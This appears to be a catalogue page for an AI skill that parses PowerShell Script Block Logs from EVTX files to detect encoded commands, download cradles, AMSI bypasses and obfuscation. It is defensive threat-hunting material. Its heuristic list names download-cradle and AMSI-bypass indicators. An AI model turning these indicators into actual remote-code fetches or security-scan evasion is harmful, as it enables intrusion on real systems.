analyst security skill risk: medium

PowerShell EVTX Script Block Analyzer

Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files, extract and reconstruct ScriptBlockText, apply detection heuristics for encoded commands, download cradl…

Policy sensitive
Human review
External action: low

SKILL 4 files · 2 folders

SKILL.md

Download

---
name: analyzing-powershell-script-block-logging
description: "Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files to detect obfuscated commands, encoded"
---
# Analyzing PowerShell Script Block Logging


## When to Use

- When investigating security incidents that require analyzing powershell script block logging
- When building detection rules or threat hunting queries for this domain
- When SOC analysts need structured procedures for this analysis type
- When validating security monitoring coverage for related attack techniques

## Prerequisites

- Familiarity with security operations concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities

## Instructions

1. Install dependencies: `pip install python-evtx lxml`
2. Collect PowerShell Operational logs: `Microsoft-Windows-PowerShell%4Operational.evtx`
3. Parse Event ID 4104 entries using python-evtx to extract ScriptBlockText, ScriptBlockId, and MessageNumber/MessageTotal for multi-part script reconstruction.
4. Apply detection heuristics:
   - Base64-encoded commands (`-EncodedCommand`, `FromBase64String`)
   - Download cradles (`DownloadString`, `DownloadFile`, `Invoke-WebRequest`, `Net.WebClient`)
   - AMSI bypass patterns (`AmsiUtils`, `amsiInitFailed`)
   - Obfuscation indicators (high entropy, tick-mark insertion, string concatenation)
5. Generate a report with reconstructed scripts, risk scores, and MITRE ATT&CK mappings.

```bash
python scripts/agent.py --evtx-file /path/to/PowerShell-Operational.evtx --output ps_analysis.json
```

## Examples

### Detect Encoded Command Execution
```python
import base64
if "-encodedcommand" in script_text.lower():
    encoded = script_text.split()[-1]
    decoded = base64.b64decode(encoded).decode("utf-16-le")
```

### Reconstruct Multi-Block Script
Scripts split across multiple 4104 events share a `ScriptBlockId`. Concatenate blocks ordered by `MessageNumber` to recover the full script.

REQUIRED CONTEXT

EVTX file containing PowerShell Operational logs (Event ID 4104)

TOOLS REQUIRED

python-evtx
lxml

EXPECTED OUTPUT

Format

structured_report

Constraints

include reconstructed scripts
include risk scores
include MITRE ATT&CK mappings
output JSON via CLI example

EXAMPLES

Includes two examples: one Python snippet for detecting encoded commands and one description of multi-block script reconstruction.

CAVEATS

Dependencies

Python 3.8+ with python-evtx and lxml
PowerShell Operational EVTX file
Familiarity with security operations concepts

Missing context

Exact output schema or format for ps_analysis.json report
Full source or specification for scripts/agent.py

Ambiguities

Description is truncated mid-sentence: 'to detect obfuscated commands, encoded'

QUALITY

OVERALL: 0.72
CLARITY: 0.75
SPECIFICITY: 0.80
REUSABILITY: 0.70
COMPLETENESS: 0.65

IMPROVEMENT SUGGESTIONS

Complete the truncated description sentence in the YAML header.
Add explicit success criteria for the generated report (e.g., required fields, risk score scale).

USAGE

Copy the prompt above and paste it into your AI of choice — Claude, ChatGPT, Gemini, or anywhere else you're working. Replace any placeholder sections with your own context, then ask for the output.